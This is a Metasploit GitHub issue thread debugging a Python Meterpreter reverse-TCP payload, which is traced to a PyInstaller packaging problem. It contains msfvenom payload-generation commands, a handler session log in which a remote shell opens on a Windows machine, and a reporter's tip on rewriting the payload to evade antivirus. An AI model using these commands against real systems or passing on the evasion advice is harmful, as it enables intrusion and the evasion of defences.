### ISSUE TITLE
Python/Meterperter/Reverse_TCP - None of the commands that use the shell work!

### ISSUE THREAD

**Issue by promc666** [rapid7/metasploit-framework#10778]
## Steps to reproduce

How'd you do it?

1. I generated a python file with msfvenom (platform: python, format: python)
2. I ran this on my test box, and it connected fine, but all the shell commands including: shell, ps, execute, kill, pkill, pgrep, mkdir, ifconfig, you get the idea.

## Expected behavior

I should be able to execute shell commands! It's essential to my usage.

## Current behavior

I can't run almost anything besides "sysinfo"

### Metasploit version

4.17.14-dev

### I installed Metasploit with:

- [x] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)

### OS

Ubuntu 16.04

**Comment by h00die** [comment]
Please provide the exact command line commands  that you used to generate the shell code with msfvenom, and how you started the handler. Is Ubuntu 16.04 the host or victim, what version of python is on the target, av installed etc. These details can help us narrow down where the issue may be

**Comment by promc666** [comment]
I've seen other people talking about this. Is it possible the python module just doesn't work? I told you the msfvenom command, platform and format. The only other part of the command is my LPORT/LHOST. Python 2.7. Ubuntu is the host, Windows 10 is the victim. The handler is not the issue.

**Comment by busterb** [comment]
you typed:
./msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.1 -f raw -o test.py
or 
./msfvenom -p python/meterpreter/reverse_http lhost=192.168.1.1 > blah.py
or
./msfvenom -p python/meterpreter/bind_tcp rhost=192.168.1.2 lport=1234 -f raw -o hmm.py
or
something else?

Note, you don't have to specify '-f python' when build a python meterpreter stager (which I'm guessing you're doing) because the output is already python, hence all of the examples above use the 'raw' format.

**Comment by busterb** [comment]
Here's an example of output that would be helpful to debug an issue like this. I tested the latest omnibus build on Debian 9 with a target box of Windows 10 with Python 2.7.15 MSI installed:
```
$ msfvenom -p python/meterpreter/reverse_tcp -f raw -o test.py LHOST=192.168.1.31
[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 450 bytes
Saved as: test.py
bcook@toaster:~
$ msfconsole -qx 'use multi/handler; set payload python/meterpreter/reverse_tcp; set lhost 192.168.1.31; run'
payload => python/meterpreter/reverse_tcp
lhost => 192.168.1.31
[*] Started reverse TCP handler on 192.168.1.31:4444
[*] Sending stage (53508 bytes) to 192.168.1.37
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.37:50251) at 2018-10-09 18:32:44 -0500

meterpreter > sysinfo
Computer        : dell
OS              : Windows 10 (Build 17134)
Architecture    : x64
System Language : en_US
Meterpreter     : python/windows
meterpreter > ls
Listing: C:\Users\bcook
=======================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
snip
meterpreter > shell
Process 6804 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17134.286]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\bcook>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\bcook>dir
 Volume in drive C has no label.

 Directory of C:\Users\bcook
snip
```

Seems to work OK in general, so more specific info, even if it seems unimportant, is helpful.

**Comment by h00die** [comment]
+1 for `ls` on Windows, it gets us all :)

**Comment by busterb** [comment]
Good call, I tried to snip out all of my typos to not distract from the main problem!

**Comment by promc666** [comment]
Whoops! It was actually a PyInstaller issue.

**Comment by promc666** [comment]
Ij ust ran the python file directly and it worked

**Comment by busterb** [comment]
How did you package meterpreter with pyinstaller?

**Comment by promc666** [comment]
It's really silly mistake. I figured it out. Basically, meterpeter is failing to import the libs after the start of the program, so I just did "import threading", and some others

**Comment by promc666** [comment]
For anyone else trying this, decode the base64 from the generated payload, add the followings imports

import shutil
import platform
import code
import socket
import struct
import time
import sys
import cStringIO
import binascii
import os
import random
import re
import select
import subprocess
import threading
import traceback

then rewrite it so it doesn't get picked up by AV as easily.

**Comment by busterb** [comment]
OK, thanks. I'll close this issue for now. Yeah, the dynamic library loading of meterpreter can fool something like pyinstaller that tries to analyze code to know what it should package.

**Comment by Jayachandra-M** [comment]
> For anyone else trying this, decode the base64 from the generated payload, add the followings imports
> 
> import shutil
> import platform
> import code
> import socket
> import struct
> import time
> import sys
> import cStringIO
> import binascii
> import os
> import random
> import re
> import select
> import subprocess
> import threading
> import traceback
> 
> then rewrite it so it doesn't get picked up by AV as easily.

Can i get the entire code sir ✌
